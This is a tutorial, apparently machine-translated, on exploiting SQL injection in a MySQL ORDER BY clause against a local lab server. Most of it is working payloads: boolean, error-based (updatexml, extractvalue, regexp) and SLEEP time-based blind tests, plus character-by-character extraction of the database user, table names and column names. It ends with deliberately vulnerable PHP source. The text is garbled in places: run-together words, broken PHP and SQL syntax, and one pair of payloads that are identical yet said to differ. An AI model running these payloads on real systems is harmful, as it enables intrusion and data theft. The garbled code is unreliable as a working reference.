Mysql Order by Injection summary

What is an ORDER by injection

The content discussed in this article refers to the controllable position order by after the clause, the following order parameter can be controlled
"select * from goods order by $_GET[‘order‘]"

Simple injection judgment

In the early injection of a large number of existence, the useorder byClause to quickly guess the number of columns, and then matchunion selectStatement to Echo. Can be modified byorderThe argument is judged by the large integer to see the echo case. You can refer to the column by its ordinal number without knowing the column name. But after testing, there is no way to do operations likeorder=3-1Andorder=2It's not the same.

http://192.168.239.2:81/?order=11 错误http://192.168.239.2:81/?order=1 正常

Further construction of payload

The previous judgment is not absolute, we need to construct a similar and 1=1 , and 1=2 payload to facilitate the injection of data

http://192.168.239.2:81/?order=IF(1=1,name,price) 通过name字段排序http://192.168.239.2:81/?order=IF(1=2,name,price) 通过price字段排序

/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过name字段排序/?order=(CASE+WHEN+(1=1)+THEN+name+ELSE+price+END) 通过price字段排序

http://192.168.239.2:81/?order=IFNULL(NULL,price) 通过name字段排序http://192.168.239.2:81/?order=IFNULL(NULL,name) 通过price字段排序

You can observe that the sorting results are different.

http://192.168.239.2:81/?order=rand(1=1) http://192.168.239.2:81/?order=rand(1=2)

Using error

In some cases, it is not possible to know the column name, and it is also less intuitive to judge the difference between two requests, such as the following if statement as an example

return multiple records

http://192.168.239.2:81/?order=IF(1=1,1,(select+1+union+select+2)) 正确http://192.168.239.2:81/?order=IF(1=2,1,(select+1+union+select+2)) 错误

/?order=IF(1=1,1,(select+1+from+information_schema.tables))  正常/?order=IF(1=2,1,(select+1+from+information_schema.tables))  错误

Using RegExp

http://192.168.239.2:81/?order=(select+1+regexp+if(1=1,1,0x00)) 正常http://192.168.239.2:81/?order=(select+1+regexp+if(1=2,1,0x00))  错误

Using Updatexml

http://192.168.239.2:81/?order=updatexml(1,if(1=1,1,user()),1)  正确http://192.168.239.2:81/?order=updatexml(1,if(1=2,1,user()),1) 错误

Using Extractvalue

http://192.168.239.2:81/?order=extractvalue(1,if(1=1,1,user())) 正确http://192.168.239.2:81/?order=extractvalue(1,if(1=2,1,user())) 错误

Time-based blinds,

Note If direct if(1=2,1,SLEEP(2)) , sleep time will become the number of records in the current table, will cause a certain denial of service attacks on the server

/?order=if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) 正常响应时间/?order=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test)) sleep 2秒

Data guess

To guess the user () is[email protected]As an example, since only one can guess, it is possible to useSUBSTR,SUBSTRING,MIDAndleftAndrightEach seat string can be segmented precisely. And then it's the comparison operation that can take advantage=,like,regexpsuch as It's important to notelikeis case insensitive

You can learn that the first digit of the user () is the r ASCII code of the 16 binary 0x72

http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x72,1,0x00)) 正确http://192.168.239.2:81/?order=(select+1+regexp+if(substring(user(),1,1)=0x71,1,0x00)) 错误

To guess the table name of the current data

/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x67,1,0x00))  正确/?order=(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)=0x66,1,0x00)) 错误

To guess the name of a column in a specified table name

/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x69,1,0x00)) 正常/?order=(select+1+regexp+if(substring((select+concat(column_name)from+information_schema.columns+where+table_schema%3ddatabase()+and+table_name%3d0x676f6f6473+limit+0,1),1,1)=0x68,1,0x00)) 错误

Sqlmap Test

In the absence of filtration, it is possible to detect the injected

Appendix Source Code

<?phpError_reporting (0); Session_Start (); Mysql_connect ("127.0.0.1","Root","Root")or  die("Database Connection Failed"); mysql_select_db ("Sqlidemo")or  die("Select Database Failed");$order=$_get[' Order '] ?$_get[' Order '] :' name ';$sql="Select Id,name,price from Goods order by $order";$result= mysql_query ($sql);$reslist=Array(); while($row= Mysql_fetch_array ($result, Mysql_assoc)) {Array_push ($reslist,$row);}EchoJson_encode ($reslist);

 Create database Sqlidemo;Use   Sqlidemo;Create TableGoods (IDint(4) not NULL Primary KeyAuto_increment, NameChar( +) not NULL, Priceint(4) not NULL); Insert  into goods (name, price) values("Apple", " ten"); Insert  into goods (name, price) values("banana") ; Insert  into goods (name, price) values("Peach") ;

Reference

http://xdxd.love/2016/03/07/order-by%E6%B3%A8%E5%85%A5%E7%82%B9%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F/
Https://dev.mysql.com/doc/refman/5.7/en/control-flow-functions.html
Https://dev.mysql.com/doc/refman/5.7/en/string-functions.html

?

Mysql Order by Injection summary